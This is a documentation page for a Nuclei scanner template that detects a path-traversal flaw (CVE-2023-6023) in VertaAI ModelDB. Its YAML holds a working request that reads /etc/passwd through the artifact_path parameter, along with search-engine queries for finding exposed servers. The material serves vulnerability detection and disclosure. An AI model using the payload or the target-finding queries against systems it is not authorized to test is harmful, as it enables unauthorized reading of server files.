Skip to content
Nuclei Templates

VertaAI ModelDB - Path Traversal

ID: CVE-2023-6023

Severity: high

Author: m0ck3d,cookiehanhoan

Tags: cve,cve2023,lfi,modeldb,vertaai

Description

Section titled “Description”

The endpoint “/api/v1/artifact/getArtifact?artifact_path=” is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2023-6023


info:
  name: VertaAI ModelDB - Path Traversal
  author: m0ck3d,cookiehanhoan
  severity: high
  description: |
    The endpoint "/api/v1/artifact/getArtifact?artifact_path=" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.
  impact: |
    Attackers can potentially exploit this vulnerability to perform a relative path traversal attack, which can lead to unauthorized access to sensitive local files on the server. As an impact it is known to affect confidentiality.
  remediation: Restrict access to the web application
  reference:
    - https://huntr.com/bounties/644ab868-db6d-4685-ab35-1a897632d2ca/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6023
    cwe-id: CWE-22,CWE-29
    epss-score: 0.003
    epss-percentile: 0.69472
    cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vertaai
    product: modeldb
    shodan-query:
      - http.favicon.hash:-2097033750
      - http.title:"verta ai"
    fofa-query:
      - icon_hash=-2097033750
      - title="verta ai"
    google-query: intitle:"verta ai"
    zoomeye-query: title="Verta AI"
  tags: cve,cve2023,lfi,modeldb,vertaai


http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename="
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a0047304502207cb5a0b2f08f91e2985dcde3aa1cc50e34105c0ab1b9ea6e9032eba267023f12022100a4b26b0a20408eba9116d4013e168acb3b4920540f27b8f119ea81fdc7bea0e4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6023.yaml"

View on Github